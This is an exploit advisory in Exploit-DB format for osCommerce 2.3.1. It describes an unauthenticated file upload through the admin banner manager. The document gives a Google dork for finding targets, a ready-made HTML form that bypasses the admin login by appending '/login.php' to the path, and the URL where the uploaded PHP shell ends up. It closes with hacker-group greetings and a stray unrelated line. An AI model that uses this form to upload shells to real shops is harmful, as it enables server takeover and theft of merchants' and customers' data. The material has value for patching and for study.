# Exploit Title: [OSC 2.3.1: Remote File Upload Vulnerability : Banner Manager] # Google Dork: [powered by oscommerce](we will automatically add these to the GHDB) # Date: [13-05-2011] # Author: [Number 7] # Software Link: [http://www.oscommerce.com/ext/oscommerce-2.3.1.zip] # Version: [2.3.1] # Tested on: [Linux-apache-win03-mac Os .... ] # CVE : [if exists] _______________________________________________________________________________________ <form name="new_banner" action="http://site/path/admin/banner_manager.php/login.php?action=insert" method="post" enctype="multipart/form-data"><br> <input type="file" name="banners_image"><br> <input name="submit" value=" Save " type="submit"></form> you will find your shell in http://site/path/images/yourshell.php _______________________________________________________________________________________ Greetz: Ares-xGeek-allen-s man-SWAT-SPAM-TN // Tn-Hackers Site: Top-sec.com/vb // arhack.net/vb
体验盒子